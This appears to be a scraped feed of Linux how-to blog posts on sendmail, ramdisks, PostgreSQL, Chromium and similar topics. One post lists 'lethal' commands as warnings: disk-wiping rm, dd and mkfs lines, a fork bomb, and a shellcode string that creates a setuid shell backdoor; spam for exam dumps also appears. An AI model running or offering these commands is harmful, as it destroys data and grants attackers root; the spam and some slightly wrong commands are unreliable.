Linux * Screw » tips

Quick Tip: Increase port range available for applications

artiomix — Tue, 15 Feb 2011 20:05:00 +0000

By default an average Linux distribution allows applications to use the following TCP port range for outgoing connections: 32,786-65,536. That’s why your system can handle up to 28,232 TCP sessions at time. Notice, this is more than enough if your Linux system is installed on the laptop or desktop and you just use it for occasional visits to facebook.com, gmail.com and linuxscrew.com (yeah!). But if you run proxy/webcache like squid or some other services which open a lot of outgoing TCP connections you will likely hit ceiling of 28,232 soon.

First of all, let’s see current port range available for TCP sessions:

cat /proc/sys/net/ipv4/ip_local_port_range

Most likely the output will show something like this one “32786 65536″. In order to expand this range you can either echo modified range into above file in /proc filesystem (temporary solution) or add corresponding line into /etc/sysctl.conf (constant solution).

To temporarily expand port range from 28,232 to 40,000 do the following:

sudo -s echo "25000 65000" > /proc/sys/net/ipv4/ip_local_port_range

To make sure new port range will be applied after reboot add the following line to /etc/sysctl.conf:

net.ipv4.ip_local_port_range="25000 65000"

or just execute this:

sudo sysctl -n net.ipv4.ip_local_port_range="25000 65000"

Sendmail for virtual users with procmail, spamassassin and dovecot

artiomix — Mon, 07 Feb 2011 07:40:05 +0000

Today I’d like to describe setup of sendmail that allows to establish receiving of e-mails for certain domain and sort incoming messages between virtual users. Those users must be able to fetch received e-mails via POP3 or IMAP protocols with or without TLS encryption. The key aspect of this kind of setup is that we will make sendmail working with virtual users which aren’t present in /etc/passwd so once it’s necessary to create new mailbox it’s not required to add new Unix/Linux account into system. Also, unlike similar configurations based on postfix we will not run mysql or postgres databases to store list of users, their settings, mail routing etc. — everything is stored in text files.

Whole setup relies on the following components: sendmail – receives mails from MTAs around the Web and sorts incoming mails between users of mail system, procmail makes it possible to apply various custom configurations for selected users e.g. set up autoresponder, filter e-mails etc., spamassassin is well known spam filter, dovecot — POP3 and IMAP service daemon.

1. Sendmail installation procedure depends on your Linux distribution but in most cases it is enough to install corresponding binary package e.g. sudo yum install sendmail or sudo apt-get install sendmail. But it is also natural idea to compile sendmail from sources to get the most fresh version — this is perfectly covered at sendmail.org.

2. If you run one of major Linux distributions you should just execute something like below in command line to get all other required components installed:

sudo apt-get install procmail spamassassin dovecot
or
sudo yum install procmail spamassassin dovecot

The possibility to install all the components from sources is still open [for geeks only].

3. Sendmail’s configuration is stored in /etc/mail directory and by default it is configured not to receive mails for any domain. We should change by adding ‘example.com’ domain to /etc/mail/local-host-names file. Please notice that MX DNS entry for your domain e.g. “example.com” should point to server where you’re trying to set up sendmail.

4. There is another key configuration file /etc/mail/virtusertable that holds all mail routing information, e.g. below line tells sendmail that all incoming mails to test@example.com should go to user ‘user1.virtual’:

test@example.com user1.virtual

The following line routes rest incoming mails to user2.virtual:

@example.com user2.virtual

5. As it comes from their names user1.virtual and use2.virtual are virtual so they shouldn’t be present in /etc/passwd. In order to make sendmail to deliver mails to virtual users it is required to specify them in /etc/alias file. E.g. if we plan to route mails destined to test@example.com to user1.virtual we should add the following line to /etc/alias:

user1.virtual: |/etc/smrsh/user1.virtual

This line tells sendmail that it should execute script /etc/smrsh/user1.virtual to deliver mail to user1.virtual. Please notice that if you place the script to ther directory than /etc/smrsh setup wont’ work. Now let’s see the contents of /etc/smrsh/user1.virtual, it contains one line including the path to procmail binary and procmailrc script for user1.virtual user:

[root@server ~]# cat /etc/smrsh/user1.virtual /usr/bin/procmail /etc/procmail.d/user1.virtual

/etc/procmail.d/user1.virtual file includes all custom settings for user1.virtual virtual user, e.g. below is an example that will receive mails to test@example.com, check them for spam and store into user1.virtual’s inbox:

[root@server ~]# cat /etc/procmail.d/user1.virtual PATH=/bin:/usr/bin:/usr/contrib/bin:/usr/sbin:/usr/local/bin:/sbin MONTHYEAR=^Date +%y%m VHOME=/var/spool/virtual/example.com/mail/user1.virtual LOGFILE=/var/spool/virtual/example.com/logs/user1.virtual/log LOGABSTRACT=all VERBOSE=on


# Spam filter

:0fw

| /usr/bin/spamc
:0:

* ^X-Spam-Status: Yes

$VHOME/spam

:0: $VHOME/inbox

As you can see spam mails will be stored in inbox while spam e-mails will be forwarded to file named ’spam’. Later on you will be able to access inbox using POP3 and spam using IMAP service. In order to prepare user1.virtual’s inbox you should do the following:

mkdir -p /var/spool/virtual/example.com/mail/user1.virtual mkdir -p /var/spool/virtual/example.com/logs/user1.virtual chown mail.mail /var/spool/virtual/example.com/mail/user1.virtual -R chown mail.mail /var/spool/virtual/example.com/logs/user1.virtual -R

As for spamassassin, it is comes configured by default so in order to start it you should start spamd daemon e.g. by command service spamd start or /etc/init.d/spamd start. You can get more information about how to configure it at SA’s website.

From this point you may try sending mails to test@example.com and see log entries in /var/spool/virtual/example.com/logs/user1.virtual/log and incoming mails in /var/spool/virtual/example.com/mail/user1.virtual/inbox. If something goes wrong it makes sense to look into /var/log/maillog sendmail’s main log file.

5. Default configuration of dovecot is rather useful and makes it possible to establish POP3 and IMAP services for virtual users in seconds. Let’s imagine you’re running dovecot 2.x version, here are some configuration keys you should add into dovecot’s config, e.g. /etc/dovecot/dovecot.conf:

protocols = pop3 imap


service pop3-login {

    inet_listener pop3 {

	port = 110

    }

}
service imap-login {

    inet_listener imap {

	port = 143

    }

}
ssl = yes

ssl_cert = 
ssl_key = 
default_login_user = mail

default_internal_user = mail
first_valid_uid=8 #this is UID of mail user that you can see in /etc/passwd

auth_mechanisms = plain login cram-md5 digest-md5
mail_location = mbox:/var/spool/virtual/example.com/mail/%u/
  userdb {

    driver = passwd-file

    args = username_format=%n /etc/dovecot/passwd

  }

  passdb {

    driver = passwd-file

    args = username_format=%n /etc/dovecot/passwd

  }

log_path = /var/log/dovecot.log info_log_path = /var/log/dovecot-info.log debug_log_path = /var/log/dovecot-debug.log

Once you make sure your dovecot’s configuration includes mentioned lines you’re welcome to try starting dovecot either by service dovecot start or by just ‘dovecot’. In case of success you will see 110 and 143 ports in output netstat -lnp or errors in dovecot’s log file /var/log/dovecot.log. Let’s imagine it started without problems

Now it’s time to set up the password for user1.virtual user, according to dovecot’s configuration suggested above the passwords are stored in /etc/dovecot/passwd. This is a text file, here is example line from it:

user1.virtual:{PLAIN}pass123:8:12

In this example user1.virtual has password pass123 stored in plain text, 8 is UID of mail user in your /etc/passwd, 12 is GID of mail group (you can also check this in /etc/passwd).

Fin.

youtube-dl: download youtube videos in Ubuntu using command line

artiomix — Wed, 19 May 2010 17:54:01 +0000

If you use Ubuntu (or other Linux distribution) and you wish to download some video from youtube.com into .flv file you can try using youtube-dl command line utility. It just downloads videos without any online applications, converters or etc. Type the following command in terminal to get it installed:

sudo apt-get install youtube-dl
Let’s imagine you would like to download the following video: http://www.youtube.com/watch?v=2leg8mUE9rs (this is part of Military Parade at Red Square in Russia at 9th of May 2010). Just run youtube-dl download utility as follows:

youtube-dl http://www.youtube.com/watch?v=2leg8mUE9rs

and in a few minutes you will get 2leg8mUE9rs.flv file that could be viewed using almost any video player like my favorite one VLC.

Fastest way to create ramdisk in Ubuntu/Linux

artiomix — Wed, 24 Mar 2010 12:08:04 +0000

I hope many of you will agree that sometimes it’s really good idea to have some small amount of RAM mounted as a filesystem. It may be necessary when running some bash or perl script that handles, say, thousands of small files so it’s much more effective not to waste computer resources on reading/writing data on hard disk but keep those files directly in memory. This idea is known as Virtual RAM Drive or ramdisk and can be setup in Ubuntu or almost any other Linux distribution using the following commands under root (to become root in Ubuntu use "sudo -s“):

# mkdir /tmp/ramdisk; chmod 777 /tmp/ramdisk
# mount -t tmpfs -o size=256M tmpfs /tmp/ramdisk/

where 256M is amount of RAM you wish to allocate for ramdisk. It’s clear that this value should be less than amount of free memory (use “free -m“). BTW, if you specify too many MBs for ramdisk Linux will try to allocate it from RAM and then from swap so resulting performance would be very poor.

Install Ruby 1.8.7 from sources in Centos 5.5

artiomix — Mon, 22 Feb 2010 20:21:41 +0000

Centos 5.5 official repository is rather outdated for today so the latest Ruby available there is 1.8.6. If you need a newer version e.g. 1.8.7 you should install if from sources:

0. Install prerequisites:

sudo yum install gcc zlib zlib-devel

1. Download the latest version of Ruby from project’s FTP:

cd /usr/src/
sudo -s
wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7.tar.gz
tar -xvzf ruby-1.8.7.tar.gz
cd ruby-1.8.7
./configure --enable-pthread
make
make install

2. Check ruby’s version is 1.8.7:

[root@li110-222 ~]# /usr/local/bin/ruby -v
ruby 1.8.7 (2008-05-31 patchlevel 0) [i686-linux]

That’s it!

13 Linux lethal commands

artiomix — Thu, 03 Dec 2009 08:02:52 +0000

In this post I will collect all commands which SHOULD NEVER be executed in Linux. Any of them will cause data loss or corruption, can freeze or hang up running system.

NEVER RUN THESE COMMANDS IN LINUX BOX CLI!

Even if somebody advises you in forum/im to do it.

1. Any of these commands will erase everything from your home directory, root or just will clear up whole disk:

sudo rm -rf /
rm -rf .*
dd if=/dev/zero of=/dev/sda
mkfs.ext3 /dev/hda
whatever > /dev/hda
cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
find -type f -mtime +30 -exec mv {} /dev/null \;
mv ~ /dev/null
mv / /dev/null

2. Causes kernel panic or freezes Linux box:

dd if=/dev/random of=/dev/port
){:|:&};: #also known as fork bomb


3. This one does the same as "rm -rf /":
char esp[] __attribute__ ((section(".text"))) /* e.s.p

release */

= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"

"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"

"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"

"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"

"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"

"\x6e\x2f\x73\x68\x00\x2d\x63\x00"

"cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;";
4. This one will prevent you from executing commands with root rights:
rm -f /usr/bin/sudo;rm -f /bin/su
If you know any other commands that can damage running Linux system or pose fatal problem to system administrators -- just comment it here so I could update this post. Thanks.
Update: See what happens if execute rm -rf / in Ubuntu: http://www.youtube.com/watch?v=wWOjmvWPRvQ

Information improvisation: Subscribe for 650-575 dumps training sessions to guarantee pass 642-611 exam. Also get free download link for the next 1z0-533 exam, after getting success in 70-433 & 642-661, you can find a wonderful job.



Quick fix of FreeBSD rtld vulnerability
artiomix — Wed, 02 Dec 2009 16:10:29 +0000
Yesterday really serious security bug was found in FreeBSD (from 7.1 to 8.0).  Using public exploit local user can gain root privileges on vulnerable system. Below is an easy way solution to fix this terrible bug:
% cd /usr/src/libexec/rtld-elf/

% fetch http://people.freebsd.org/~cperciva/rtld.patch

% cat rtld.patch | patch -p1

% make && make install && make clean
Thanks to soko1 from truebsd.org.



Postgresql: show tables, show databases, show columns
artiomix — Fri, 03 Jul 2009 20:50:16 +0000
PostgreSQL is one of the best database engines for an average web project and many who moves to psql from mysql (for example) often ask the following questions: what  is the analog of “show tables” in postgres? or how can I get the list of databases in postgres like “show databases” in mysql? The answers are short:
mysql: SHOW TABLES

postgresql: \d

postgresql: SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';
mysql: SHOW DATABASES

postgresql: \l

postgresql: SELECT datname FROM pg_database;
mysql: SHOW COLUMNS

postgresql: \d table

postgresql: SELECT column_name FROM information_schema.columns WHERE table_name ='table';



Install Ubuntu Chromium browser (Google Chrome for Linux)
artiomix — Mon, 22 Jun 2009 14:30:18 +0000
Update: Using Ubuntu Lucid Lynx? Here is corresponding article for you:

Install Google Chrome (Chromium) on Ubuntu Lucid Lynx.
One of the easiest way to try Chromium browser in Ubuntu Linux (Google Chrome browser for Unix/Linux operating system is named as Chromium) is to use daily binary builds at https://launchpad.net/chromium-project. Today Ubuntu is the most popular Linux disributions for desktops so there are daily builds available for the following Ubuntu versions: hardy, intrepid, jaunty, karmic.
First let your Ubuntu know where it should find chromium-browser deb package:
vi /etc/apt/sources.list
add the following lines:
deb http://ppa.launchpad.net/chromium-daily/ppa/ubuntu jaunty main

deb-src http://ppa.launchpad.net/chromium-daily/ppa/ubuntu jaunty main
Replace jaunty with hardy, intrepid or karmic depending which version you run at your computer. If you feel this information is not sufficient for you, follow this link to get Ubuntu official information on this matter or follow Launchpad help.
The next step is to install Chromium browser:
sudo apt-get update

sudo apt-get install chromium-browser

or

sudo aptitude install chromium-browser
Once you press enter Ubuntu will download around 18 MB of data from launchpad’s server and will install Chromium with gnome menu entries and shortcuts. Now you can go to System menu –> Internet –> Chromium Web Browser in order to launch Google browser.
Ubuntu Chromium Google browser (Google Chrome Ubuntu)
As you might know there is still no official release of chromium/chrome available for Linux, so these daily builds from launchpad are for testing/observations purposes only. For example, there is no flash plugin available so you will be able to see html pages like this one and no swf/flash content. Anyway thanks to Google for great browser which has all chances to become “browser number one” for Linux or even for the rest of operating system such as Windows or Mac. Who knows?  
You might also find this page using Google and the following keywords: Ubuntu Chrome, Google Chrome Ubuntu, Chrome for Ubuntu and others.

Information improvisation: Remarkable online HP0-S23 and a+ braindumps training programs will lead you to success in the 350-050 and HP2-E31 exams. We also offer latest 642-731 dumps with 100% success guarantee.





Tiny bash scripts: check Internet connection availability
artiomix — Thu, 02 Apr 2009 07:54:12 +0000
Sometimes it is necessary to check whether server you want to run some big bash script is connected to Internet. Usually it makes sense while running scripts periodically using cron.  Below is the tiny bash script for this purpose:
#!/bin/bash

WGET="/usr/bin/wget"

$WGET -q --tries=10 --timeout=5 http://www.google.com -O /tmp/index.google &> /dev/null
if [ ! -s /tmp/index.google ];then
	echo "no"
else
	echo "yes"
fi
As you see it tries to download google’s index page, if it’s not empty script returns “yes”, if there is not Internet connection available script will return “no”. If it is impossible to fetch the page in more than 5 seconds script will return “no” as well.
Anything to add? You are welcome!